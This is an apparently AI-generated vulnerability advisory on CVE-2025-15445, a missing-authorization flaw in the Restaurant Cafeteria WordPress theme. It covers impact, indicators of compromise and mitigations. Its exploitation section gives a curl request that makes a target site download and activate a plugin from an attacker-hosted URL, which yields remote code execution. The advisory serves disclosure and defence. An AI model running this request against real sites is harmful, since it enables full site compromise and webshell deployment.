CVE-2025-15445: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-15445 is a Missing Authorization vulnerability in the Restaurant Cafeteria WordPress theme through version 0.4.6 that allows any authenticated user (including subscribers) to install and activate arbitrary plugins or import demo content that overwrites site configuration. The vulnerability was discovered by researcher Khaled Alenazi (Nxploited), added to WPScan on 2026-02-27, and publicly published on 2026-03-06. It carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, though WPScan rates it 4.3 (Medium), and is classified under CWE-862 (Missing Authorization) (WPScan, Red Hat). No fixed version is currently known.

Technical details

The root cause is CWE-862 (Missing Authorization): the theme registers admin-ajax action handlers (restaurant_cafeteria_install_and_activate_plugin and import_theme_mods) without performing nonce verification or WordPress capability checks. Because these AJAX endpoints are accessible to any authenticated WordPress user, a low-privileged subscriber can POST directly to wp-admin/admin-ajax.php with a user-supplied plugin ZIP URL, causing the server to download, extract, and activate the plugin — resulting in arbitrary PHP code execution on activation. A second action (import_theme_mods) allows the same class of user to overwrite site-wide configuration including theme mods, pages, menus, and front page settings (WPScan).

Impact

Successful exploitation of the plugin-installation vector grants an attacker arbitrary PHP code execution on the WordPress server, effectively achieving full site compromise including data exfiltration, webshell deployment, and lateral movement within the hosting environment. The demo-content import vector allows any subscriber to silently overwrite critical site configuration (theme mods, pages, menus, front page), causing significant integrity and availability impact to the website. Both attack paths require only a valid low-privilege WordPress account, making the effective attack surface broad on sites with open registration (WPScan, Red Hat).

Exploitability

A working Proof of Concept (PoC) is publicly available via WPScan, demonstrating both the arbitrary plugin installation/activation and the demo content import vectors using simple curl commands. The EPSS score is 0.000180 (very low probability of near-term exploitation), and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution or in-the-wild exploitation has been reported at this time (WPScan).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the Restaurant Cafeteria theme (version ≤ 0.4.6) via passive fingerprinting (e.g., checking theme stylesheet headers or using WPScan).
  2. Obtain a low-privilege account: Register or obtain any valid WordPress account on the target site (subscriber-level access is sufficient).
  3. Prepare malicious plugin: Create a ZIP archive containing a valid WordPress plugin with a malicious payload (e.g., a PHP webshell or reverse shell) and host it at an attacker-controlled URL. The ZIP must contain a folder and main PHP file matching the declared text domain.
  4. Trigger plugin installation: Send an authenticated POST request to wp-admin/admin-ajax.php with the action restaurant_cafeteria_install_and_activate_plugin, specifying plugin_details[plugin_text_domain], plugin_details[plugin_main_file], and plugin_details[plugin_url] pointing to the attacker-hosted ZIP:
curl -i 'http://TARGET/wp-admin/admin-ajax.php' \
  -H 'Cookie: wordpress_logged_in_...=<session_cookie>' \
  -d 'action=restaurant_cafeteria_install_and_activate_plugin' \
  -d 'plugin_details[plugin_text_domain]=evilplug' \
  -d 'plugin_details[plugin_main_file]=evilplug.php' \
  -d 'plugin_details[plugin_url]=http://ATTACKER/evilplug.zip'
  1. Achieve RCE: The server downloads, extracts, and activates the plugin; the plugin's PHP code executes immediately upon activation, granting arbitrary code execution.
  2. Optional – Site defacement/config overwrite: Send a POST to the same endpoint with action=import_theme_mods to overwrite site configuration, pages, and menus with the theme's demo content (WPScan).

Indicators of compromise

  • Network: Unexpected POST requests to /wp-admin/admin-ajax.php with action=restaurant_cafeteria_install_and_activate_plugin or action=import_theme_mods from low-privilege user sessions; outbound HTTP/HTTPS requests from the web server process to external or unusual URLs (plugin ZIP download).
  • File System: New or unexpected directories and PHP files appearing under wp-content/plugins/ that were not installed through the WordPress admin dashboard; presence of webshell files (e.g., files containing eval, base64_decode, system, exec) in plugin directories.
  • Logs: Web server access logs showing POST requests to admin-ajax.php with the above action parameters from subscriber-level authenticated sessions; WordPress debug logs recording plugin activation events for unrecognized plugins.
  • WordPress Database: Unexpected changes to wp_options entries for active_plugins, theme_mods_restaurant-cafeteria, page_on_front, show_on_front, or nav menu assignments inconsistent with administrator activity.

Mitigation and workarounds

There is currently no known fix for CVE-2025-15445 — the Restaurant Cafeteria theme through version 0.4.6 remains vulnerable with no patched release available (WPScan). Site administrators should consider deactivating and removing the theme until a patched version is released. As a compensating control, disable open user registration to prevent unauthenticated users from obtaining the subscriber-level access required for exploitation, and implement a Web Application Firewall (WAF) rule to block POST requests to admin-ajax.php containing the restaurant_cafeteria_install_and_activate_plugin or import_theme_mods action parameters from non-administrator sessions.

Community reactions

The vulnerability was reported by independent researcher Khaled Alenazi (Nxploited) and verified by WPScan. A brief mention appeared on Bluesky via the CVE feed account. No significant vendor statements, major media coverage, or notable researcher commentary beyond the WPScan advisory have been identified (WPScan).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management